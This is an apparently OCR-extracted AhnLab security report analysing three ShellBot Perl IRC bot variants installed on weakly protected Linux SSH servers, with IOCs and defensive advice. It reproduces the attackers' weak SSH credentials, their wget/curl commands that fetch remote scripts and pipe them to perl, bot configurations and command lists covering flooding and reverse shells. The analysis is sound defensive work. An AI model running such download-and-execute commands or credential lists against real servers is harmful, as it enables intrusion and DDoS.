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AhnLab Security Emergency response Center (ASEC) has recently discovered the ShellBot 
malware being installed on poorly managed Linux SSH servers. ShellBot, also known as 
PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to 
communicate with the C&C server. ShellBot is an old malware that has been in steady use 
and is still being used today to launch attacks against Linux systems. 


1. Attack Campaigns Against Linux SSH Servers 


Unlike desktop, which is the main work environment for normal users, servers usually take 
charge of providing specific services. Accordingly, malware attacks are typically carried out 
through web browsers or email attachments in desktop environments, and threat actors also 
distribute malware disguised as legitimate software to induce users to install them. Threat 
actors attacking server environments use a different method since there are limits to 
distributing malware in the ways mentioned above. Services that are poorly managed or are 
weak to vulnerability exploitations because they have not been patched to the latest version 
are the prime targets. 


A main example of a poorly managed service is one where simple account credentials are 
used, causing the server to be vulnerable to dictionary attacks. Remote Desktop Protocol 
(RDP) and MS-SQL service are prime examples of attack vectors that are used when 


1/10 


targeting Windows operating systems. In Linux servers, Secure Shell (SSH) services are 
usually targeted for attacks. In loT environments where an old Linux server or embedded 
Linux OS has been installed, the Telnet service becomes targeted for dictionary attacks. 


The ShellBot malware strains that are going to be covered in this post are believed to have 
been installed after threat actors used account credentials that have been obtained through 
the use of scanners and SSH BruteForce malware on target systems. After scanning 
systems that have operational port 22s, threat actors search for systems where the SSH 
service is active and uses a list of commonly used SSH account credentials to initiate their 
dictionary attack. The following is a list of the actual account credentials used by threat 
actors who install ShellBot. (A far greater number of account credentials were used in the 
actual attacks, but only the main examples were organized here.) 


User Password 
deploy password 
hadoop hadoop 


oracle oracle 


root 11111 

root PasswOrd 
ttx ttx2011 
ubnt ubnt 


Table 1. A portion of the account credentials used by ShellBot operators 


2. Internet Relay Chat (IRC) Protocol 


A characteristic of ShellBot, aside from the fact that it is developed in Perl, is that it uses an 
IRC protocol to communicate with C&C servers. IRC is a real-time Internet chat protocol 
developed in 1988. Users log onto certain channels of certain IRC servers and chat with 
other users who have logged onto the same channel in real time. 


IRC Bot is a bot malware that abuses this IRC service to communicate with C&C servers. 
The IRC Bot installed on the infected system accesses an IRC server’s channel designated 


by the threat actor according to the IRC protocol, after which it transmits stolen information to 


the specified channel, or when the attacker enters a particular string, receives this as a 
command and performs the corresponding malicious behavior. 
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IRC has seen consistent use from malware since the past as it uses a preexisting IRC 
protocol and IRC server without having to develop a separate C&C server and protocol. 
Although it has been seeing less use by malware targeting Windows operating systems, a 
large number of IRC Bots are still being distributed on Linux. 


3. ShellBot Analysis 


ShellBot has been used by various threat actors for a considerable amount of time, and a 
previous ASEC Blog post covered its use in attacks along with CoinMiners. 


Shc Linux Malware Installing CoinMiner 


Another characteristic of ShellBot is the fact that they all have different forms and features 
since threat actors can customize them. The team has categorized ShellBot into three main 
types based on recent findings and summarized the commands, characteristics, and DDoS 
attacks the malware uses during installation. 


3.1. LiGhT’s Modded perlbot v2 
The following is a ShellBot named “LiGhT’s Modded perlbot v2”. 


PHHHHHHHHHR RHR RS 
# Version info # 
HHHHHHHRH ARS RRR 

if ($funcarg =~ /*version/) { 


sendraw($IRC_cur_socket, "PRIVMSG $printl :|.:Version:.| LiGhT’s Modded perlbot v2."); 


1 


} 
PHHHHA FHS AHHH SHH S RHR RF 
# End of Version info # 
BRHRRERHRHHRRHRHHHHRHHRHH 


Figure 1. ShellBot version information 

“LiGhT’s Modded perlbot v2” is being used by a variety of threat actors. The following 
commands are used in the ShellBot installation after the SSH server has been successfully 
logged into. 


Filename Installation Command 


ak wget -qO — x-x-x[.]online/ak|perl 

perl nproc; nvidia-smi —list-gpus ;cd /tmp;wget -qO — 
http://34.225[.]57.146/futai/perl|perl;rm -rf perl 

mperl cd /tmp ; wget 193.233.202[.]219/mperl ; perl mperl ; rm -rf mperl 

niko2 cd /tmp ; wget 193.233.202[.]219/niko1 ; perl niko1 ; rm -rf niko1 
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Table 2. Command used to install LiGhT’s Modded perlbot v2 

Configuration data such as the C&C server and the name of the channel to join are included 
in the initial routine of ShellBot. A nickname with the format “IP-[5 random digits]” is used to 
join the IRC channels. 


1 #!/usr/bin/perl 
2 #!u @ddos 
3 #!u @commands 
4 #!u @irc 
5 HHFHRRARAAHRAR RRR RR aR 
6 my $processo = '/usr/sbin/mysql'; 
7 my $linas_max='16'; 
8 my $sleep='5'; 
9 my $cmd=""; 
18 my $id=""; 
11 RR RRR RRR ES 
12 my @adms=("A","A"); 
13 my @canais=("#nou"); 
14 my $chanpass = "@"; 
15 $num = int rand(99999); 
16 my $nick = “IP-" . $num. ""; 
17 my $ircname ="VICTIM' ; 
18 chop (my $realname = ‘VICTIM ‘); 
19 $servidor='164.98.246.68' unless $servidor; 
28 my $porta='6667'; 
21 HHHHHAAHH AH HARRA ARTA SARS AR RARE SE 
ShellBot 
Filename C&C URL Channel Name 
ak 164.90.240[.]68:6667  #nou 
per 164.132.224].]207:80 #mailbomb 
mperl 206.189.139[.]152:6667 #Q 
niko1 176.123.2[.]3:6667 #X 


Figure 2. Configuration data of 


Table 3. C&C URL and channels of LiGhT’s Modded perlbot v2 

The “LiGhT’s Modded perlbot v2” version of ShellBot offers various features which are 
largely categorized in the table below. Commands that can actually be used for malicious 
purposes include DDoS commands such as TCP, UDP, and HTTP Flooding. It also includes 
a variety of commands that allows control over infected systems so that they can be used in 
other attacks such as reverse shell, log deletion, and scanner. 


Command (Category) Description 
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Command (Category) Description 


flooding IRC Flooding 
irc IRC control commands 
ddos DDoS commands 


TCP, UDP, HTTP, SQL Flooding, etc. 
news DDoS attack commands against security web pages 


hacking Attack commands 
MultiScan, Socks5, LogCleaner, Nmap, Reverse Shell, etc. 


linuxhelp Help 
extras Additional features (Assumed to be related to DDoS attacks) 
version Version information output 


Table 4. Features supported by LiGhT’s Modded perlbot v2 


3.2. DDoS PBot v2.0 


Aside from “LiGhT’s Modded perlbot v2”, “DDoS PBot v2.0” is also being used in a variety of 
attacks. A characteristic of “DDoS PBot v2.0” is that it shows basic information and available 
commands in the annotations that can be seen during its initial routine. 


SESE EEE HEHEHEHE HH A ARERR RR ER RA HRA SS E EHE BH E E E E HE RS BRS HAAR AAR RES SS RSS 
HRH RH RHH HH RA ARR AE RARER AR RR AR ARATE RAR RAS RRA E AA RA ARR R RARE HE REA E HHHH 


## DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team ## [ Help | #HRIERHHEI H HHRHH RH HH R 

## Stealth Multifunctional IrcBot writen in Perl HHFAHHRRAA HRA RRAR SAAR AR AAR AA AAA RR ARES ARR AA RAR RAR RA RR 
## Teste on every system with PERL instlled ## lu @system ## 
## ## lu @version HF 
## This is a free program used on your own risk. ## !u @channel ## 
## Created for educational purpose only. ## lu @flood ## 
## I'm not responsible for the illegal use of this program. ## !u @utils ## 


HRE HEIHE EAE EEEE HEA HEEE E HRE HE EE E E E EHE EEE HE EEEE EEE EEE HEE BEE E EEEE E E E E EEE EE HEE H HHHH 
## [ Channel | #####HHtHHHHtHHHHe [ Flood ] HHHH HHH RHE EH RREH [ Utils ] sitet 
SREB EER TERR RE RA RAR HEE E H HHE H E E E E EHE E E H HE EHE E E HHE HHHH 


## lu @join <#channel> ## lu @udpi <ip> <port> <time> ## lu @cback <ip> <port> ## 
## !u @part <#channel> ## !u @udp2 <ip> <packet size> <time> ## lu @downlod <url+path> <file> ## 
## lu luejoin <#channel> ## lu @udp3 <ip> <port> <time> ## lu @portscan <ip> et 
## !u top <channel> <nick> ## !u @tcp <ip> <port> <packet size> <time> ## !u @mail <subject> <sender> FF 
## !u !deop <channel> <nick> ## !u @http <site> <time> #2 <recipient> <message> ## 
## !u !voice <channel> <nick> ## ## lu pwd;uname -a;id <for example> ## 
## !u !devoice <channel> <nick> ## !u @ctcpflood <nick> ## lu @port <ip> <port> fF 
## !u !nick <newnick> ## = !u @msgflood <nick> ## lu @dns <ip/host> ## 
## lu !msg <nick> ## lu @noticeflood <nick> ## FF 
## lu !quit ## ## ## 
## lu !luaw ## ## ## 
## lu @die ## FF zF 
## ## ## ## 


Figure 3. Initial routine of DDoS PBot v2.0 
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The following are commands used to install “DDoS PBot v2.0”. 


Filename Installation Command 
bash wget -qO — 80.94.92[.]241/bash|perl 


test.jpg uname -a;wget -q -O- hxxp://185.161.208[.]234/test.jpg|perl;curl -sS 
hxxp://185.161.208[.]234/test.jpg|perl;nproc;history -c 


dred uname -a;lspci | grep -i —color ‘vga|3d|2d’;curl -s -L 
hxxp://39.165.53[.]17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred 


Table 5. Commands used to install DDoS PBot v2.0 
“DDoS PBot v2.0” randomly chooses a nickname from a selection of over 500, which include 


» 6b 


“abbore’”, “ably”, and “abyss”, before joining an IRC channel. 


62 my @rircname = ("abbore","“ably","abyss”,“acrima”,"aerodream",”afkdemon”,"ainthere”, “alberto”, “alexia”,”alexndra”, 
63 “alias”, “alikki","alphaa",”“alterego”,"alvin",“ambra”,"amed™","andjela”,"andreas”,"anja”, 


64 “anjing",”anna","apeq”,"arntz”,"arskaz”,"as",”asmodizz","assse”,athanas”,“aulis”, 
"aus","bar", bast”, "“bedem”, "beeth", “bella”, "birillo”,"bizio",“blackhand”,"blacky”, 
66 "blietta”, “"blondenor", “blueangel”, "bluebus”, “bluey”, “bobi", “bopoh”, “borre”, “boy”, "bram", 
67 “brigitta”, “brio”, “brrrweg”,“brujah”, “caprcorn”,”carloto”,“catgirl”,”cathren",“cemanmp",“chainess”, 
68 "“chaingone”,“chck","chriz”,"cigs”,"cintat","clarissa”,”"clbiz",“clex","cobe","cocker", 


"coke", "colin", “conan” ,”"condoom”," coop”, “coopers”, "corvonero", “countzero”, “cracker”, "cread", 


Figure 4. List of DDoS PBot v2.0 nicknames 


Filename C&C URL Channel Name 
bash 51.195.42[.]59:8080  #sex 

test.jpg gsm.ftp[.Jsh:1080 #test 

dred 192.3.141[.]163:6667 #bigfalus 


Table 6. C&C URL and channels of DDoS PBot v2.0 
Additionally, regular IRC Bots receive commands from the threat actor via the IRC channels 


to perform malicious acts. Thus, there is a need to verify the threat actor sending commands. 


Without a verification process, any users can join the channel and control the bots however 
they want. 


In order to do this, the IRC Bot has to perform an additional task where users that have 
joined the channel must verify their nickname and host address before they can enter a 
command. For example, in the case of the “bash” malware, the nickname must be either 


“crond,” “drugs,” or “tab” as defined in the “admins” variable, while the host address must be 
“localhost” as defined in the “hostauth” variable. 
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$server = '51.195.42.59° unless $server; 
my $port = '8080'; 


my $linas_max='8'; 
my $sleep='5'; 


my $homedir = “/tmp"; 


ay. $version: = “Dies Per] Bot við”; Figure 5. Configuration data of DDoS PBot 


my @admins = (“crond","drugs","tab"); 
my @hostauth = ("localhost"); 
my @channels = ("#sex"); 


my $pacotes = 1; 


v2.0 
Like regular ShellBots, “DDoS PBot v2.0” also offers a variety of malicious commands 
including DDoS attack commands. 


Command (Category) Description 


system Infected system information output 
version Version information output 
channel IRC control commands 

flood DDoS commands 


TCP, UDP, HTTP, SQL Flooding, etc. 


utils Attack commands 
Port Scan, Reverse Shell, file download, etc. 


Table 7. Features supported by DDoS PBot v2.0 


3.3. PowerBots (C) GohacK 


The main characteristic of PowerBots is that it has a simpler form in comparison to the 
ShellBot types covered above. 
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owmon awn - 


10 
11 
12 
13 
14 
15 
16 
17 
18 
19 
20 
21 
22 
23 
24 
25 
26 
27 
28 
29 
30 


my @hostauth = ("w"); 
my @admchan=("#x"); 


my @server = ("49.212.234.206"); 
$servidor= $server[rand scalar @server] unless $servidor; 


my $xeqt = “!"; 
my $homedir = “/tmp"; 
my $shellaccess = 1; 
my $xstats = 1; 
my $pacotes = 1; 


my $linas_max = 5; 


my $sleep = 6; Figure 6. 


my $portime = 4; 
my @fakeps = ("/usr/sbin/sshd"); 
my @nickname = ("Linux"); 


my @xident = ("KAST"); 
my @xname = ("uname -a ); 


HHHHHH HHH RT 

# Random Ports 

HHH HHH HHH HHH Ha 

my @rports = ("3303"); 


Configuration data of PowerBots 


Filename Installation Command 


ff 


uname -a ;wget -qO — hxxp://80.68.196[.]6/ff|perl &>>/dev/null 


Table 8. Command used to install PowerBots 


Filename C&C URL Channel Name 


ff 


49.212.234[.]206:3303 #x 


Table 9. C&C URL and channel of DDoS PBot v2.0 


ShellBot types usually offer a variety of DDoS attack features, but since PowerBots mainly 
focuses on its reverse shell and file downloading capabilities, it is likely that the threat actor 


installed ShellBot as a backdoor. 


Command Description 


ps 


Port scanning 
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Command Description 


namp NMAP port scanning 

rm Delete files in a particular path 
version Version information output 
down File download 

udp UDP Flooding attack 

back Reverse Shell 


Table 10. Features supported by PowerBots 


4. Conclusion 


Recently, threat actors have been installing variants of the ShellBot malware on inadequately 


managed Linux SSH servers. These types of attacks have been occurring consistently since 
the past and numerous attacks are still being confirmed. If ShellBot is installed, Linux servers 
can be used as DDoS Bots for DDoS attacks against specific targets after receiving a 
command from the threat actor. Moreover, the threat actor could use various other backdoor 
features to install additional malware or launch different types of attacks from the 
compromised server. 


Because of this, administrators should use passwords that are difficult to guess for their 
accounts and change them periodically to protect the Linux server from brute force attacks 
and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. 
Administrators should also use security programs such as firewalls for servers accessible 
from outside to restrict access by attackers. Finally, V3 should be updated to the latest 
version so that malware infection can be prevented. 


File Detection 
— Shellbot/Perl.Generic.S1100 (2020.02.12.00) 
— Shellbot/Perl.Generic.S1118 (2020.02.19.07) 


IOC 

MD5 

— bef1a9a49e201095da0bb26642f65a78 : ak 

— 3eef28005943fee7 7f48ac6ba633740d : mperl 

— 55e5bfa75d72e9b579e59c00eaeb6922 : niko1 
— 6d2c754760ccd6e078de931f472c0f72 : perl 

— 7ca3f23f54e8c027a7e8b517995ae433 : bash 
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— 2cf90bf5b61d605c116ce4715551b7a3 : test.jpg 
— 7bc4c22b0f34ef28b69d83a23a6c88C5 : dred 
— 176ebfc431daa903ef83e69934759212 : ff 


Download URLs 

— x-x-x[.Jonline/ak 

— 193.233.202[.]219/mperl 

— 193.233.202[.]219/niko1 

— hxxp://34.225.57[.]146/futai/perl 

— 80.94.92[.]241/bash 

— hxxp://185.161.208[.]234/test.jpg 

— hxxp://39.165.53[.]17:8088/iposzz/dred 
— hxxp://80.68.196[.]6/ff 


C&C URLs 

— 164.90.240[.]68:6667 : ak 

— 206.189.139[.]152:6667 : mperl 
— 176.123.2[.]3:6667 : niko1 

— 164.132.224[.]207:80 : perl 

— 51.195.42].]59:8080 : bash 

— gsm.ftp[.]sh:1080 : test.jpg 

— 192.3.141[.]163:6667 : dred 

— 49.212.234[.]206:3303 : ff 


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to 
check related IOC and detailed analysis information. 
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